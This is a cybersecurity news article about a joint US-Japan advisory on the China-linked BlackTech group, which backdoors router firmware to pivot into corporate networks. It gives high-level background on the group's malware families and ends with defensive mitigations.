Cybersecurity agencies from Japan and the U.S. have warned of attacks mounted by a state-backed hacking group from China to stealthily tamper with branch routers and use them as jumping-off points to access the networks of various companies in the two countries.
The attacks have been tied to a malicious cyber actor dubbed BlackTech by the U.S. National Security Agency (NSA), Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC).
"BlackTech has demonstrated capabilities in modifying router firmware without detection and exploiting routers' domain-trust relationships to pivot from international subsidiaries to headquarters in Japan and the United States, which are the primary targets," the agencies said in a joint alert.
Targeted sectors encompass government, industrial, technology, media, electronics, and telecommunication sectors, as well as entities that support the militaries of the U.S. and Japan.
BlackTech, also called by the names Circuit Panda, HUAPI, Manga Taurus, Palmerworm, Red Djinn, and Temp.Overboard, has a history of operating against targets in East Asia, specifically Taiwan, Japan, and Hong Kong at least since 2007.
Trend Micro, in December 2015, described the threat actor as well-funded and organized, striking key industry verticals – namely government, consumer electronics, computer, healthcare, and finance – located in the region.
It has since been attributed to a wide range of backdoors such as BendyBear, BIFROSE (aka Bifrost), Consock, KIVARS, PLEAD, TSCookie (aka FakeDead), XBOW, and Waterbear (aka DBGPRINT). PLEAD campaigns documented by the cybersecurity firm in June 2017 have entailed the exploitation of vulnerable routers for use as command-and-control (C&C) servers.
"PLEAD actors use a router scanner tool to scan for vulnerable routers, after which the attackers will enable the router's VPN feature then register a machine as virtual server," Trend Micro noted at the time. "This virtual server will be used either as a C&C server or an HTTP server that delivers PLEAD malware to their targets."
 |
| Image Source: PwC |
Typical attack chains orchestrated by the threat actor involve sending spear-phishing emails with backdoor-laden attachments to deploy malware designed to harvest sensitive data, including a downloader called Flagpro and backdoor known as BTSDoor, PwC disclosed in October 2021, noting "router exploitation is a core part of TTPs for BlackTech."
Earlier this July, Google-owned Mandiant highlighted Chinese threat groups' "targeting of routers and other methods to relay and disguise attacker traffic both outside and inside victim networks."
The threat intelligence company further linked BlackTech to a malware named EYEWELL that's primarily delivered to Taiwanese government and technology targets and which "contains a passive proxy capability that can be used to relay traffic from other systems infected with EYEWELL within a victim environment."
The extensive set of tools points to a highly-resourceful hacking crew boasting of an ever-evolving malware toolset and exploitation efforts to sidestep detection and stay under the radar for lengthy periods by taking advantage of stolen code-signing certificates and other living-off-the-land (LotL) techniques.
In its latest advisory, CISA et al called out the threat actor for possessing capabilities to develop customized malware and tailored persistence mechanisms for infiltrating edge devices, often modifying the firmware to maintain persistence, proxying traffic, blending in with corporate network traffic, and pivoting to other victims on the same network.
Put differently, the rogue modifications to the firmware incorporate a built-in SSH backdoor that allows the operators to maintain covert access to the router by making use of magic packets to activate or deactivate the function.
"BlackTech actors have compromised several Cisco routers using variations of a customized firmware backdoor," the agencies said. "The backdoor functionality is enabled and disabled through specially crafted TCP or UDP packets. This TTP is not solely limited to Cisco routers, and similar techniques could be used to enable backdoors in other network equipment."
Cisco, in its own bulletin, said the most prevalent initial access vector in these attacks concerns stolen or weak administrative credentials and that there is no evidence of active exploitation of any security flaws in its software.
"Certain configuration changes, such as disabling logging and downloading firmware, require administrative credentials," the company said. "Attackers used compromised credentials to perform administrative-level configuration and software changes."
As mitigations, it's recommended that network defenders monitor network devices for unauthorized downloads of bootloaders and firmware images and reboots and be on the lookout for anomalous traffic destined to the router, including SSH.
